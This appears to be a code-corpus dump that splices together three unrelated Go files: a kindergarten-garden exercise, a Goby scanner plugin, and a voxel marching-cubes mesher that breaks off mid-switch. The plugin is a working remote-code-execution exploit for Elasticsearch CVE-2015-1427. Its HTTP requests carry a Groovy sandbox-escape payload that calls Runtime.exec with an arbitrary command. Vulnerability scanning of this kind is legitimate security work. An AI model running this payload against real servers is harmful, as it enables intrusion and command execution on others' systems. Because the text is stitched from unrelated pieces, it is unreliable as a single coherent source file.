} | game/component/components.go | 0.531209 | 0.497864 | components.go | starcoder |
package kindergarten
import (
"fmt"
"sort"
"strings"
)
// plants maps the diagram plant code to a plant name.
var plants = map[rune]string{
'C': "clover",
'G': "grass",
'R': "radishes",
'V': "violets",
}
// Garden represents the garden containing students' plants.
type Garden struct {
studentRowPosition map[string]int
plantRows [][]rune
}
// NewGarden accepts a diagram representing plant rows and a list of child
// names and returns Garden. If the diagram or list of child names is not
// valid, then an error is returned.
func NewGarden(diagram string, children []string) (*Garden, error) {
rows := strings.Split(diagram, "\n")
if len(rows) != 3 {
return nil, fmt.Errorf("want a diagram with 2 rows of plants and each row on it's own line (got %s)", diagram)
}
if len(rows[1]) == 0 || len(rows[2]) == 0 {
return nil, fmt.Errorf("want each row to be non-empty (got %s)", diagram)
}
if len(rows[1]) != len(rows[2]) {
return nil,
fmt.Errorf("want each diagram row to be equal length, got %d != %d",
len(rows[1]), len(rows[2]))
}
if len(rows[1])%2 != 0 || len(rows[2])%2 != 0 {
return nil, fmt.Errorf("want each row to have an even number of plants (got %s)", diagram)
}
for _, r := range rows[1:] {
for _, c := range r {
if _, ok := plants[c]; !ok {
return nil,
fmt.Errorf("invalid diagram, want plant code C, G, R, V, got %s",
string(c))
}
}
}
if len(children) == 0 {
return nil, fmt.Errorf("want a non-empty list of children")
}
studentRowPosition := map[string]int{}
for _, c := range children {
studentRowPosition[c] = 0
}
if len(studentRowPosition) != len(children) {
return nil, fmt.Errorf("want non-duplicated student names (got %q)", children)
}
if len(rows[1])+len(rows[2]) != 4*len(studentRowPosition) {
return nil,
fmt.Errorf("invalid diagram, want %d plants, got %d",
4*len(studentRowPosition), len(rows[1])+len(rows[2]))
}
sortedNames := make([]string, len(children))
copy(sortedNames, children)
sort.Strings(sortedNames)
for i, name := range sortedNames {
studentRowPosition[name] = 2*i + 1
}
plantRows := [][]rune{[]rune(rows[1]), []rune(rows[2])}
return &Garden{studentRowPosition: studentRowPosition, plantRows: plantRows}, nil
}
// Plants accepts a child and returns a list of the child's
// plants and a bool indicating whether the child actually
// has planted anything in the given Garden.
func (g *Garden) Plants(child string) ([]string, bool) {
rowPosition, ok := g.studentRowPosition[child]
if !ok {
return nil, false
}
planted := []string{}
for _, row := range g.plantRows {
p1, p2 := row[rowPosition-1], row[rowPosition]
planted = append(planted, plants[p1])
planted = append(planted, plants[p2])
}
return planted, true
} | go/exercism/go/kindergarten-garden/kindergarten_garden.go | 0.671794 | 0.403449 | kindergarten_garden.go | starcoder |
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "Elasticsearch Remote Code Execution CVE-2015-1427",
"Description": "The Groovy script engine before Elasticsearch 1.3.8 and the Groovy script engine in 1.4.x before 1.4.3 allow remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands through elaborate scripts.",
"Product": "Elasticsearch",
"Homepage": "https://www.elastic.co/cn/elasticsearch/",
"DisclosureDate": "2021-04-11",
"Author": "zhzyker",
"GobyQuery": "product=elasticsearch",
"Level": "3",
"Impact": "<p>In 2014, a remote code execution vulnerability (CVE-2014-3120) was exposed. The vulnerability appeared in the script query module. Since search engines support the use of script code (MVEL) as an expression for data manipulation, attackers can use MVEL Construct and execute arbitrary java code,</p><p>Later, the scripting language engine was changed to Groovy and a sandbox was added to control it. Dangerous codes would be intercepted. As a result, this time because the sandbox restrictions were not strict, it led to remote code execution.</p>",
"Recommandation": "<p>Close the groovy sandbox to stop the use of dynamic scripts:<br></p><pre><code>script.groovy.sandbox.enabled: false<br></code></pre>",
"References": [
"https://github.com/zhzyker"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/website/blog/",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{ \"name\": \"cve-2015-1427\" }"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/_search?pretty",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/text"
},
"data_type": "text",
"data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"echo 460f7ccb583e25e09c0fe100a2c9e90d\\\").getText()\"}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "460f7ccb583e25e09c0fe100a2c9e90d",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/website/blog/",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{ \"name\": \"cve-2015-1427\" }"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody"
]
},
{
"Request": {
"method": "POST",
"uri": "/_search?pretty",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/text"
},
"data_type": "text",
"data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"{{{cmd}}}\\\").getText()\"}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "460f7ccb583e25e09c0fe100a2c9e90d",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|(?s)\"lupin\" : \\[ \"(.*)\" \\]"
]
}
],
"Tags": [
"RCE"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
} | 2015/CVE-2015-1427/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go | 0.553747 | 0.435241 | Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go | starcoder |
package binvox
import (
"fmt"
"log"
"strings"
gl "github.com/fogleman/fauxgl"
)
const (
g0 neighborBitMap = 1 << iota // Classical Marching Cubes grid points
g1
g2
g3
g4
g5
g6
g7
)
var (
verbose = false
)
type neighborBitMap byte
type manifoldMap map[Key]neighborBitMap
func (b *BinVOX) ManifoldMesh() *gl.Mesh {
gridCells := make(manifoldMap) // grid cell locations
keyFunc := func(v Key) {
gridCells[Key{v.X, v.Y, v.Z}] = gridCells[Key{v.X, v.Y, v.Z}] | g0
gridCells[Key{v.X - 1, v.Y, v.Z}] = gridCells[Key{v.X - 1, v.Y, v.Z}] | g1
gridCells[Key{v.X, v.Y + 1, v.Z}] = gridCells[Key{v.X, v.Y + 1, v.Z}] | g3
gridCells[Key{v.X - 1, v.Y + 1, v.Z}] = gridCells[Key{v.X - 1, v.Y + 1, v.Z}] | g2
gridCells[Key{v.X, v.Y, v.Z - 1}] = gridCells[Key{v.X, v.Y, v.Z - 1}] | g4
gridCells[Key{v.X - 1, v.Y, v.Z - 1}] = gridCells[Key{v.X - 1, v.Y, v.Z - 1}] | g5
gridCells[Key{v.X, v.Y + 1, v.Z - 1}] = gridCells[Key{v.X, v.Y + 1, v.Z - 1}] | g7
gridCells[Key{v.X - 1, v.Y + 1, v.Z - 1}] = gridCells[Key{v.X - 1, v.Y + 1, v.Z - 1}] | g6
}
for v := range b.WhiteVoxels {
keyFunc(v)
}
for v := range b.ColorVoxels {
keyFunc(v)
}
var tris []*gl.Triangle
vpmm := b.VoxelsPerMM()
mmpv := 1.0 / vpmm
s := gl.V(mmpv, mmpv, mmpv)
t := gl.V(b.TX, b.TY, b.TZ)
voxelToVector := func(k Key, dx, dy, dz float64) gl.Vector {
x := float64(k.X) + 1
y := float64(k.Y)
z := float64(k.Z) + 1
v := gl.V(x+dx, y+dy, z+dz).Mul(s).Add(t)
// vlog("voxelToVector(%v, %v, %v, %v) = %v", k, dx, dy, dz, v)
return v
}
for k, v := range gridCells {
tris = append(tris, grid2tris(k, v, voxelToVector)...)
}
return gl.NewMesh(tris, nil)
}
func vlog(fmts string, args ...interface{}) {
if verbose {
log.Printf(fmts, args...)
}
}
type voxelToVectorFunc func(k Key, dx, dy, dz float64) gl.Vector
func apply(k Key, v2v voxelToVectorFunc, in []*gl.Triangle) (out []*gl.Triangle) {
for _, t := range in {
p1 := t.V1.Position
p2 := t.V2.Position
p3 := t.V3.Position
out = append(out, gl.NewTriangleForPoints(v2v(k, p1.X, p1.Y, p1.Z), v2v(k, p2.X, p2.Y, p2.Z), v2v(k, p3.X, p3.Y, p3.Z)))
}
return out
}
func rotateTrisClockwiseZ(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dy, -dx, dz) }
}
func rotateTrisCounterClockwiseZ(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dy, dx, dz) }
}
func rotateTris180Z(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dx, -dy, dz) }
}
func rotateTrisClockwiseX(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, dz, -dy) }
}
func rotateTrisCounterClockwiseX(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, -dz, dy) }
}
func rotateTris180X(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, -dy, -dz) }
}
func rotateTrisClockwiseY(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dz, dy, -dx) }
}
func rotateTrisCounterClockwiseY(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dz, dy, dx) }
}
func rotateTris180Y(top2v voxelToVectorFunc) voxelToVectorFunc {
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dx, dy, -dz) }
}
func mirrorX(top2v voxelToVectorFunc) voxelToVectorFunc { // flips normals
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dx, dy, dz) }
}
func mirrorY(top2v voxelToVectorFunc) voxelToVectorFunc { // flips normals
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, -dy, dz) }
}
func mirrorZ(top2v voxelToVectorFunc) voxelToVectorFunc { // flips normals
return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, dy, -dz) }
}
// flipNormals must make copies so that the originals are not messed up.
func flipNormals(tris []*gl.Triangle) (out []*gl.Triangle) {
for _, t := range tris {
out = append(out, gl.NewTriangle(t.V1, t.V3, t.V2))
}
return out
}
// grid2tris converts grid cells to triangles.
func grid2tris(k Key, n neighborBitMap, v2v voxelToVectorFunc) (tris []*gl.Triangle) {
vlog("grid2tris: k=%v, n= %v", k, n)
switch n { // 256 cases
case 0, 0xff: // no faces - all inside or all outside
// single corners
case g0:
return apply(k, v2v, singleCorner)
case g1:
return apply(k, rotateTrisClockwiseZ(v2v), singleCorner)
case g2:
return apply(k, rotateTris180Z(v2v), singleCorner)
case g3:
return apply(k, rotateTrisCounterClockwiseZ(v2v), singleCorner)
case g4:
return apply(k, rotateTrisCounterClockwiseZ(rotateTris180X(v2v)), singleCorner)
case g5:
return apply(k, rotateTris180Z(rotateTris180X(v2v)), singleCorner)
case g6:
return apply(k, rotateTrisClockwiseZ(rotateTris180X(v2v)), singleCorner)
case g7:
return apply(k, rotateTris180X(v2v), singleCorner)
case g0 | g1 | g2 | g3 | g4 | g6 | g7: // mirrorZ of g1
return apply(k, rotateTrisClockwiseZ(mirrorZ(v2v)), singleCorner)
case g0 | g1 | g3 | g4 | g5 | g6 | g7: // mirrorZ of g6, mirrorX of g3, mirrorY of g1
return apply(k, rotateTrisClockwiseZ(mirrorY(v2v)), singleCorner)
case g0 | g2 | g3 | g4 | g5 | g6 | g7: // mirrorZ of g5, mirrorX of g0
return apply(k, mirrorX(v2v), singleCorner)
case g0 | g1 | g2 | g4 | g5 | g6 | g7: // mirrorZ of g7
return apply(k, rotateTris180X(mirrorZ(v2v)), singleCorner)
case g1 | g2 | g3 | g4 | g5 | g6 | g7: // mirrorZ of g4, mirrorX of g1
return apply(k, rotateTrisClockwiseZ(mirrorX(v2v)), singleCorner)
case g0 | g1 | g2 | g3 | g5 | g6 | g7: // mirrorX of g5, mirrorZ of g0
return apply(k, mirrorZ(v2v), singleCorner)
case g0 | g1 | g2 | g3 | g4 | g5 | g7: // mirrorX of g7
return apply(k, rotateTris180X(mirrorX(v2v)), singleCorner)
case g0 | g1 | g2 | g3 | g4 | g5 | g6: // mirrorX of g6, mirrorY of g4, mirrorZ of g3
return apply(k, rotateTrisCounterClockwiseZ(mirrorZ(v2v)), singleCorner)
// single faces
case g0 | g1 | g2 | g3: // bottom
return apply(k, rotateTrisClockwiseX(v2v), singleFace)
case g4 | g5 | g6 | g7: // top
return apply(k, rotateTrisCounterClockwiseX(v2v), singleFace)
case g0 | g1 | g4 | g5: // back
return apply(k, v2v, singleFace)
case g1 | g2 | g5 | g6: // right
return apply(k, rotateTrisClockwiseZ(v2v), singleFace)
case g2 | g3 | g6 | g7: // front
return apply(k, rotateTris180Z(v2v), singleFace)
case g0 | g3 | g4 | g7: // left
return apply(k, rotateTrisCounterClockwiseZ(v2v), singleFace)
// two adjacent corners
case g0 | g1: // back lower horizontal
return apply(k, v2v, twoAdjacentCorners)
case g0 | g3: // left lower horizontal
return apply(k, rotateTrisCounterClockwiseZ(v2v), twoAdjacentCorners)
case g1 | g2: // right lower horizontal
return apply(k, rotateTrisClockwiseZ(v2v), twoAdjacentCorners)
case g2 | g3: // front lower horizontal
return apply(k, rotateTris180Z(v2v), twoAdjacentCorners)
case g0 | g4: // left back vertical
return apply(k, rotateTrisClockwiseY(v2v), twoAdjacentCorners)
case g1 | g5: // right back vertical
return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v)), twoAdjacentCorners)
case g2 | g6: // front right vertical
return apply(k, rotateTrisClockwiseY(rotateTris180Z(v2v)), twoAdjacentCorners)
case g3 | g7: // front left vertical
return apply(k, rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(v2v)), twoAdjacentCorners)
case g4 | g5: // back upper horizontal
return apply(k, rotateTrisCounterClockwiseX(v2v), twoAdjacentCorners)
case g4 | g7: // left upper horizontal
return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), twoAdjacentCorners)
case g5 | g6: // right upper horizontal
return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), twoAdjacentCorners)
case g6 | g7: // front upper horizontal
return apply(k, rotateTrisCounterClockwiseX(rotateTris180Z(v2v)), twoAdjacentCorners)
case g0 | g1 | g2 | g3 | g6 | g7: // vertical mirror of g0 | g1
return apply(k, mirrorZ(v2v), twoAdjacentCorners)
case g0 | g1 | g2 | g3 | g5 | g6:
return apply(k, rotateTrisCounterClockwiseZ(mirrorZ(v2v)), twoAdjacentCorners)
case g0 | g1 | g4 | g5 | g6 | g7:
return apply(k, mirrorY(v2v), twoAdjacentCorners)
case g0 | g3 | g4 | g5 | g6 | g7:
return apply(k, rotateTrisCounterClockwiseZ(mirrorX(v2v)), twoAdjacentCorners)
case g1 | g2 | g4 | g5 | g6 | g7:
return apply(k, rotateTrisClockwiseZ(mirrorX(v2v)), twoAdjacentCorners)
case g2 | g3 | g4 | g5 | g6 | g7: // mirrorZ of g4 | g5
return apply(k, rotateTrisCounterClockwiseX(mirrorZ(v2v)), twoAdjacentCorners)
case g1 | g2 | g3 | g5 | g6 | g7: // mirrorX of g1 | g5, mirrorY of g3 | g7
return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(mirrorX(v2v))), twoAdjacentCorners)
case g0 | g1 | g2 | g4 | g5 | g6: // mirrorX of g2 | g6, mirrorY of g0 | g4
return apply(k, rotateTrisClockwiseY(mirrorY(v2v)), twoAdjacentCorners)
case g0 | g2 | g3 | g4 | g6 | g7: // mirrorX of g0 | g4
return apply(k, rotateTrisClockwiseY(mirrorX(v2v)), twoAdjacentCorners)
case g0 | g1 | g3 | g4 | g5 | g7: // mirrorX of g3 | g7, mirrorY of g1 | g5
return apply(k, rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(mirrorX(v2v))), twoAdjacentCorners)
case g0 | g1 | g2 | g3 | g4 | g5: // mirrorY of g4 | g5, mirrorZ of g2 | g3
return apply(k, rotateTris180Z(mirrorZ(v2v)), twoAdjacentCorners)
case g0 | g1 | g2 | g3 | g4 | g7: // mirrorZ of g1 | g2
return apply(k, rotateTrisClockwiseZ(mirrorZ(v2v)), twoAdjacentCorners)
// two opposite level corners
case g0 | g2: // bottom
return apply(k, v2v, twoOppositeLevelCorners)
case g1 | g3: // bottom
return apply(k, rotateTrisClockwiseZ(v2v), twoOppositeLevelCorners)
case g0 | g7: // left
return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseX(v2v)), twoOppositeLevelCorners)
case g3 | g4: // left
return apply(k, rotateTrisClockwiseY(v2v), twoOppositeLevelCorners)
case g0 | g5: // back
return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(v2v)), twoOppositeLevelCorners)
case g1 | g4: // back
return apply(k, rotateTrisCounterClockwiseX(v2v), twoOppositeLevelCorners)
case g1 | g6: // right
return apply(k, rotateTrisCounterClockwiseY(v2v), twoOppositeLevelCorners)
case g2 | g5: // right
return apply(k, rotateTrisCounterClockwiseY(rotateTrisClockwiseX(v2v)), twoOppositeLevelCorners)
case g3 | g6: // front
return apply(k, rotateTrisClockwiseX(v2v), twoOppositeLevelCorners)
case g2 | g7: // front
return apply(k, rotateTrisClockwiseX(rotateTrisClockwiseY(v2v)), twoOppositeLevelCorners)
case g4 | g6: // top
return apply(k, rotateTris180X(rotateTrisClockwiseZ(v2v)), twoOppositeLevelCorners)
case g5 | g7: // top
return apply(k, rotateTris180X(v2v), twoOppositeLevelCorners)
// two opposite diagonal corners
case g0 | g6:
return apply(k, v2v, twoOppositeDiagonalCorners)
case g1 | g7:
return apply(k, rotateTrisClockwiseZ(v2v), twoOppositeDiagonalCorners)
case g2 | g4:
return apply(k, rotateTris180Z(v2v), twoOppositeDiagonalCorners)
case g3 | g5:
return apply(k, rotateTrisCounterClockwiseZ(v2v), twoOppositeDiagonalCorners)
// three adjacent corners
case g0 | g1 | g2:
return apply(k, v2v, threeAdjacentCorners)
case g0 | g1 | g3:
return apply(k, rotateTrisCounterClockwiseZ(v2v), threeAdjacentCorners)
case g0 | g2 | g3:
return apply(k, rotateTris180Z(v2v), threeAdjacentCorners)
case g1 | g2 | g3:
return apply(k, rotateTrisClockwiseZ(v2v), threeAdjacentCorners)
case g4 | g5 | g6:
return apply(k, rotateTris180X(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
case g4 | g5 | g7:
return apply(k, rotateTris180X(rotateTris180Z(v2v)), threeAdjacentCorners)
case g4 | g6 | g7:
return apply(k, rotateTris180X(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
case g5 | g6 | g7:
return apply(k, rotateTris180X(v2v), threeAdjacentCorners)
case g0 | g4 | g5:
return apply(k, rotateTrisCounterClockwiseY(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
case g1 | g2 | g6:
return apply(k, rotateTrisClockwiseY(rotateTris180Z(v2v)), threeAdjacentCorners)
case g2 | g3 | g6:
return apply(k, rotateTrisClockwiseX(v2v), threeAdjacentCorners)
case g0 | g4 | g7:
return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
case g2 | g3 | g7:
return apply(k, rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
case g0 | g3 | g7:
return apply(k, rotateTrisClockwiseX(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
case g0 | g1 | g5:
return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
case g1 | g5 | g6:
return apply(k, rotateTrisCounterClockwiseY(v2v), threeAdjacentCorners)
case g3 | g6 | g7:
return apply(k, rotateTrisCounterClockwiseX(rotateTris180Z(v2v)), threeAdjacentCorners)
case g2 | g6 | g7:
return apply(k, rotateTrisCounterClockwiseY(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
case g1 | g4 | g5:
return apply(k, rotateTrisCounterClockwiseX(v2v), threeAdjacentCorners)
case g0 | g1 | g4:
return apply(k, rotateTrisClockwiseX(rotateTris180Z(v2v)), threeAdjacentCorners)
case g3 | g4 | g7:
return apply(k, rotateTrisCounterClockwiseY(rotateTris180Z(v2v)), threeAdjacentCorners)
case g2 | g5 | g6:
return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), threeAdjacentCorners)
case g0 | g3 | g4:
return apply(k, rotateTrisClockwiseY(v2v), threeAdjacentCorners)
case g1 | g2 | g5:
return apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(v2v)), threeAdjacentCorners)
case g0 | g1 | g2 | g3 | g6:
return apply(k, rotateTris180X(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
case g0 | g1 | g2 | g3 | g7:
return apply(k, rotateTris180X(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g1 | g4 | g5 | g6 | g7:
return apply(k, rotateTris180Z(v2v), flipNormals(threeAdjacentCorners))
case g0 | g4 | g5 | g6 | g7:
return apply(k, rotateTrisClockwiseZ(v2v), flipNormals(threeAdjacentCorners))
case g0 | g3 | g4 | g5 | g7:
return apply(k, rotateTrisClockwiseY(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
case g2 | g3 | g5 | g6 | g7:
return apply(k, rotateTrisClockwiseX(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
case g2 | g3 | g4 | g6 | g7:
return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g0 | g3 | g4 | g6 | g7:
return apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g1 | g2 | g5 | g6 | g7:
return apply(k, rotateTrisClockwiseY(v2v), flipNormals(threeAdjacentCorners))
case g0 | g1 | g4 | g5 | g7:
return apply(k, rotateTrisClockwiseX(v2v), flipNormals(threeAdjacentCorners))
case g0 | g1 | g4 | g5 | g6:
return apply(k, rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g1 | g2 | g4 | g5 | g6:
return apply(k, rotateTrisClockwiseX(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g2 | g4 | g5 | g6 | g7:
return apply(k, rotateTrisCounterClockwiseZ(v2v), flipNormals(threeAdjacentCorners))
case g0 | g2 | g3 | g6 | g7:
return apply(k, rotateTrisCounterClockwiseX(v2v), flipNormals(threeAdjacentCorners))
case g0 | g2 | g3 | g4 | g7:
return apply(k, rotateTrisCounterClockwiseY(v2v), flipNormals(threeAdjacentCorners))
case g0 | g1 | g2 | g5 | g6:
return apply(k, rotateTrisCounterClockwiseY(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
case g1 | g2 | g3 | g5 | g6:
return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g0 | g1 | g2 | g4 | g5: // (inverse = g367 = case g3 | g6 | g7:)
return apply(k, rotateTrisCounterClockwiseX(rotateTris180Z(v2v)), flipNormals(threeAdjacentCorners))
case g3 | g4 | g5 | g6 | g7: // (inverse = g012 = case g0 | g1 | g2:)
return apply(k, v2v, flipNormals(threeAdjacentCorners))
case g0 | g1 | g2 | g3 | g5: // (inverse = g467 = case g4 | g6 | g7:)
return apply(k, rotateTris180X(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g0 | g1 | g3 | g4 | g7: // (inverse = g256 = case g2 | g5 | g6:)
return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g0 | g1 | g2 | g3 | g4: // (inverse = g567 = case g5 | g6 | g7:)
return apply(k, rotateTris180X(v2v), flipNormals(threeAdjacentCorners))
case g1 | g2 | g3 | g6 | g7: // (inverse = g045 = case g0 | g4 | g5:)
return apply(k, rotateTrisCounterClockwiseY(rotateTrisCounterClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
case g0 | g1 | g3 | g4 | g5: // (inverse = g267 = case g2 | g6 | g7:)
return apply(k, rotateTrisCounterClockwiseY(rotateTrisClockwiseZ(v2v)), flipNormals(threeAdjacentCorners))
// half corners
case g0 | g1 | g2 | g5:
tris = append(tris, apply(k, v2v, halfCorner)...)
tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(v2v)), halfCorner)...)
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(v2v)), halfCorner)...)
return tris
case g0 | g1 | g3 | g4:
tris = append(tris, apply(k, rotateTrisCounterClockwiseZ(v2v), halfCorner)...)
tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTris180Z(v2v)), halfCorner)...)
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(v2v))), halfCorner)...) // could be simplified to two rotations
return tris
case g0 | g2 | g3 | g7:
tris = append(tris, apply(k, rotateTris180Z(v2v), halfCorner)...)
tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisClockwiseZ(v2v)), halfCorner)...)
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTris180Z(v2v))), halfCorner)...) // could be simplified to two rotations
return tris
case g0 | g4 | g5 | g7: // ok, now I'm just being lazy. It works.
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), halfCorner)...)
tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)))), halfCorner)...)
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)))), halfCorner)...)
return tris
case g1 | g2 | g3 | g6:
tris = append(tris, apply(k, rotateTrisClockwiseZ(v2v), halfCorner)...)
tris = append(tris, apply(k, rotateTrisClockwiseX(v2v), halfCorner)...)
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v))), halfCorner)...) // could be simplified to two rotations, but let's allow the computer some fun.
return tris
case g1 | g4 | g5 | g6:
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(v2v), halfCorner)...)
tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(rotateTrisCounterClockwiseX(v2v))), halfCorner)...)
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseX(v2v))), halfCorner)...)
return tris
case g2 | g5 | g6 | g7:
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), halfCorner)...)
tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)))), halfCorner)...)
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)))), halfCorner)...)
return tris
case g3 | g4 | g6 | g7:
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTris180Z(v2v)), halfCorner)...)
tris = append(tris, apply(k, rotateTrisClockwiseX(rotateTrisCounterClockwiseZ(rotateTrisCounterClockwiseX(rotateTris180Z(v2v)))), halfCorner)...)
tris = append(tris, apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseY(rotateTrisCounterClockwiseX(rotateTris180Z(v2v)))), halfCorner)...)
return tris
// unusual cases
case g0 | g3 | g5 | g6 | g7:
return apply(k, v2v, g0357)
case g0 | g1 | g2 | g6 | g7: // (inverse = g345 = case g3 | g4 | g5:)
return apply(k, mirrorZ(rotateTrisCounterClockwiseZ(v2v)), flipNormals(g0357))
case g3 | g4 | g5: // (inverse = g01267 = case g0 | g1 | g2 | g6 | g7:)
